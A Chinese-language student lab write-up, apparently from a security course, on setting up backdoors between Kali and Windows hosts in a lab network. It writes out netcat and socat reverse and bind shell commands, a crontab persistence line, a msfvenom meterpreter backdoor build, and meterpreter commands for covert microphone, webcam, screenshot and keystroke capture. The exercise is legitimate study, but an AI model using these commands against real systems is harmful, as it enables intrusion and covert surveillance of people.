标签:不同的 lin 指令 用户 vim msfvenom stream nbsp 开始
在Windows下,先使用ipconfig
指令查看本机IP:
使用ncat.exe
程序监听本机的5317
端口:
在Kali环境下,使用nc
指令的-e
选项反向连接Windows主机的5317
端口:
Windows下成功获得了一个Kali的shell,运行ls
指令如下:
过程与之前的类似,在Kali环境下用ifconfig
查看IP:
使用nc
指令监听5317
端口:
在Windows下,使用ncat.exe
程序的-e
选项项反向连接Kali主机的5317
端口:
Kali下可以看到Windows的命令提示,可以输入Windows命令:
Windows下监听5317
端口:
Kali下连接到Windows的5317
端口:
建立连接之后,就可以传输数据了,这里传输的是字符串,相当于两台主机在聊天,也可以用重定向操作符来传输文件:
先在Windows系统下,监听5317
端口:
在Kali环境下,使用man crontab
指令查看crontab
命令的帮助文档,从文档中我们可以知道crontab
指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab
文件中,以供之后读取和执行。
用crontab -e
指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
在最后一行添加18 * * * * /bin/netcat 192.168.1.110 5317 -e /bin/sh
,意思是在每个小时的第18分钟反向连接Windows主机的5317
端口:
当时间到了,此时已经获得了Kali的shell,可以输入指令:
socat
是ncat
的增强版,它使用的格式是socat [options] <address> <address>
,其中两个address
是必选项,而options
是可选项。socat
的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address
就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5215,同时把cmd.exe
的stderr重定向到stdout上:
创建完成之后,按Windows+L
快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:
此时,在Kali环境下输入指令socat - tcp:192.168.1.110:5317
,这里的第一个参数-
代表标准的输入输出,第二个流连接到Windows主机的5215
端口,此时可以发现已经成功获得了一个cmd shell:
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=5317 -f exe > 20145317_backdoor.exe
生成后门程序:
通过nc
指令将生成的后门程序传送到Windows主机上:
在Kali上使用msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
设置完成后,执行监听:
打开Windows上的后门程序:
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用record_mic
指令可以截获一段音频:
使用webcam_snap
指令可以使用摄像头进行拍照:
使用webcam stream
指令可以使用摄像头进行录像:
使用screenshot
指令可以进行截屏:
使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:
感觉这次实践比上次还有趣,尤其是后门被激活后,meterpreter的功能一经展示出来,简直被震惊。如果未开启防火墙,或防火墙不够高级,所谓监听、隐秘偷拍竟然是这么轻而易举的事情。
标签:不同的 lin 指令 用户 vim msfvenom stream nbsp 开始
原文地址:http://www.cnblogs.com/5317p/p/6577671.html